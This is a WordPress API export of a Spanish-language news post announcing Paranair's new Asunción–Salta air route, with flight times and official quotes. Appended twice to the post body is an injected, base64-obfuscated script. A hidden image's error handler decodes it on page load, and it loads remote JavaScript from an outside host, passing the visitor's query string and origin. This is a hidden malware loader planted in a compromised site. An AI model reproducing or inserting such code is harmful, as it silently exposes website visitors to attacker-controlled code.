{"id":4823,"date":"2025-02-11T12:11:00","date_gmt":"2025-02-11T15:11:00","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4823"},"modified":"2025-08-13T23:40:55","modified_gmt":"2025-08-14T02:40:55","slug":"manana-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4823","title":{"rendered":"Ma\u00f1ana ser\u00e1 el vuelo inaugural de la ruta Asunci\u00f3n \u2013 Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-ad6213d4c40ba42110b968897f0c9f91\" style=\"background-color:#0c88d0\"><strong><em>Con esta nueva conexi\u00f3n a\u00e9rea, que tendr\u00e1 dos frecuencias semanales, Salta se consolida como el principal centro receptivo del Norte Argentino, teniendo tres conexiones internacionales: Asunci\u00f3n, San Pablo y Lima.<\/em><\/strong><\/h4>\n\n\n\n<p>El primer vuelo de la ruta a\u00e9rea Asunci\u00f3n \u2013 Salta, arribar\u00e1 en el aeropuerto Mart\u00edn Miguel de G\u00fcemes este&nbsp;mi\u00e9rcoles 12 de febrero a las 15:15, con lo que la empresa Paranair dejar\u00e1 inaugurado el servicio, que contar\u00e1 con dos frecuencias semanales, con aeronaves regionales Bombardier CRJ-200ER con capacidad para 50 pasajeros.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"4824\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10430-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4824\"\/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4825\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4825\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10431-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"4826\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-1024x576.webp\" alt=\"\" class=\"wp-image-4826\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-1024x576.webp 1024w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-300x169.webp 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-768x432.webp 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-746x420.webp 746w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta-696x392.webp 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2025\/02\/10432-el-12-de-febrero-sera-el-vuelo-inaugural-de-la-ruta-asuncion-salta.webp 1066w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>La ministra de Turismo y Deportes,&nbsp;<strong>Manuela Arancibia<\/strong>&nbsp;destac\u00f3 \u201cesta nueva conexi\u00f3n a\u00e9rea marca un hito en el turismo y comercio entre ambas ciudades, acercando a turistas y empresarios de Argentina y Paraguay\u201d, al tiempo que manifest\u00f3 que \u201cjunto a Paranair trabajamos en estrategias conjuntas de promoci\u00f3n, tanto en Salta como en Asunci\u00f3n para promover esta nueva ruta a\u00e9rea\u201d.<\/p>\n\n\n\n<p>Con esta nueva conexi\u00f3n a\u00e9rea la Provincia se consolida como la puerta de ingreso al pa\u00eds por el Norte argentino, teniendo tres conexiones internacionales (San Pablo, Lima y Asunci\u00f3n) y seis nacionales a todas las regiones del pa\u00eds.<\/p>\n\n\n\n<p>En t\u00e9rminos tur\u00edsticos, Paraguay representa un mercado clave para Salta, destac\u00e1ndose entre los turistas regionales que hist\u00f3ricamente m\u00e1s visitan la provincia y aquellos con mayor grado de fidelidad hacia el destino. Con este vuelo, la oportunidad de ampliar la cuota de mercado de turistas paraguayos son exponenciales.<\/p>\n\n\n\n<p>Cabe destacar que Paranair iniciar\u00e1 operaciones a Salta con dos frecuencias semanales, partiendo los d\u00edas mi\u00e9rcoles desde Asunci\u00f3n a las 13:45, con horario estimado de arribo a Salta a las 15:15. El vuelo de regreso de los mi\u00e9rcoles saldr\u00e1 desde Salta a las 16:00, llegando a Asunci\u00f3n a las 17:30. Asimismo los d\u00edas s\u00e1bados el vuelo desde Salta saldr\u00e1 a las 14:10, llegando a Asunci\u00f3n a las 15:40; y el vuelo desde Asunci\u00f3n tendr\u00e1 como horario de salida 11:55 y de llegada 13:25.<\/p>\n\n\n\n<p>La venta de los tickets se encuentra habilitada a trav\u00e9s del sistema de comercializaci\u00f3n de la aerol\u00ednea:&nbsp;<a href=\"https:\/\/www.paranair.com\/es-ar\/home-ar\/\">https:\/\/www.paranair.com\/es-ar\/home-ar\/<\/a>&nbsp;as\u00ed como tambi\u00e9n se pueden adquirir desde distintas agencias de viajes y turismo.<\/p>\n\n\n\n<p><strong>Sobre Paranair<\/strong><\/p>\n\n\n\n<p>La l\u00ednea a\u00e9rea de bandera de Paraguay, Paranair, con base en el aeropuerto internacional Silvio Pettirossi de Asunci\u00f3n cuenta actualmente con conexi\u00f3n directa con Ciudad del Este (6 frecuencias semanales), Buenos Aires (14 frecuencias semanales), C\u00f3rdoba (4 frecuencias semanales), Montevideo (14 frecuencias semanales) y Santa Cruz de la Sierra (7 frecuencias semanales), entre sus conexiones m\u00e1s destacadas.<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Con esta nueva conexi\u00f3n a\u00e9rea, que tendr\u00e1 dos frecuencias semanales, Salta se consolida como el principal centro receptivo del Norte Argentino, teniendo tres conexiones internacionales: Asunci\u00f3n, San Pablo y Lima. El primer vuelo de la ruta a\u00e9rea Asunci\u00f3n \u2013 Salta, arribar\u00e1 en el aeropuerto Mart\u00edn Miguel de G\u00fcemes este&nbsp;mi\u00e9rcoles 12 de febrero a las 15:15, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4825,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[5],"tags":[],"class_list":{"0":"post-4823","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-buses-y-aeropuertos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4823"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4823"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4823\/revisions"}],"predecessor-version":[{"id":6575,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4823\/revisions\/6575"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4825"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4823"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4823"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4823"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}